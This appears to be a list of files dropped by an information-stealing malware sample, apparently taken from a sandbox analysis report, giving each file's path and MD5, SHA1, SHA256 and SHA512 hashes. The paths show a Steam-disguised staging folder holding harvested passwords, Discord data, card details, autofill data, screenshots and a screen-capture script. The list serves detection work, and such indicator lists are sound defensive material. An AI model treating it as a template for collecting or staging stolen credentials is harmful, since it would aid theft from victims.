SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Serial-Check.txt

MD5 b09e44af5a0a077819cd7c62fe83357e
SHA1 1ddbec4e77ed4f007bcb6c094204ae0245560660
SHA256 555d1b4ede6b1c5abb9ef7dee44d540246c9843cd38777848c0915a99f478f1d
SHA512 1902aec90c61cbae7223a4817e2a47168127799c801897315b9e6a1fe510883634f190c9c124c6f40c4149e36c792dab7f0b5a1cd37d615d6768bb60079c3051

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\debug.log

MD5 aa6ef9d02f8b6fd065ded92a535c9532
SHA1 69735c4c3da2ee38c9e90242fc1f6a7722be02b8
SHA256 e60a4c95d4ba6dc936520003de48d40e14f245b1ac3f0c09a099e70cc4637479
SHA512 15de24f2b2cb6fbd45bf909f6c0c4a1e7dda68af9e3582316f6a5fff8e5e7198a571f57acbe916fa059830adcc31b4e4559bd75a30038f48a8544762e8a7a7e2

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 9161beb967c9aa0acb2e15b0e8a229fa
SHA1 3380743736ad0f9acb57f32f0c28c415a2e09a9c
SHA256 4adf851c1a3a8d5c55f904819f9a4d86f1d67c869a01cca6faa731d4889204ba
SHA512 d99999a1ec7d28916dac5679a47f23c61d3520683aa97910c95fce6a924558fc076f38b6b74646b08737aa7d8c7fb5ed1a5dad058c00ace38f5005896463427a

C:\ProgramData\Steam\Launcher\EN-Bvrkipts.zip

MD5 371ff618f3c6fe0c89a28007716979e9
SHA1 a84aa4760787decd26a7417e6829197ecf805262
SHA256 ab4f353fc4f04626b1409202c718e83624ba7cfe1b14044b2b2cd810c9e891e0
SHA512 f38383b649f43c7fc59c1e3919a3a9e9c29716590c1e025de81531ffbaabf8e6e6b622ec2951601745b507a60bc6b3525b46f98eb83a0a4c9aca371b0245efdc

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Screenshots\Screenshot.png

MD5 9a051f66302aeb51e1c2717ae7e4394a
SHA1 191a89747f7b0486af71ff010b3e04ffc7f090cd
SHA256 58fa618c0b6b3e9032264aecf8e7b0e87497f61830f161f135c2ea7de76234b8
SHA512 8fc781e9599388e5967d1f2278355c4e2c21d68aa3cb13aece582cf333800b0e94f6365b929339b9bf99d498f8373a2e3e491d029d5cc5579a31a7a71ae6cd2e

C:\ProgramData\Steam\Launcher\EN-BVR~1\debug.log

MD5 59ddd2c30c178c4b88afe1204196bd65
SHA1 52bdd354f5b7453d6087c411148ea264ee6c415e
SHA256 159ee890215cff899938f1e5d6597b8a8b155bd46771167315d33350a76c6677
SHA512 22a4abd4194eac15010ec31413ccb1682c8a430c75c95496bf576a29d1f17a8f62b803c4d1d4a992f130c7aecf2d6e8b332e122205cde4f0e93623299aa7dfac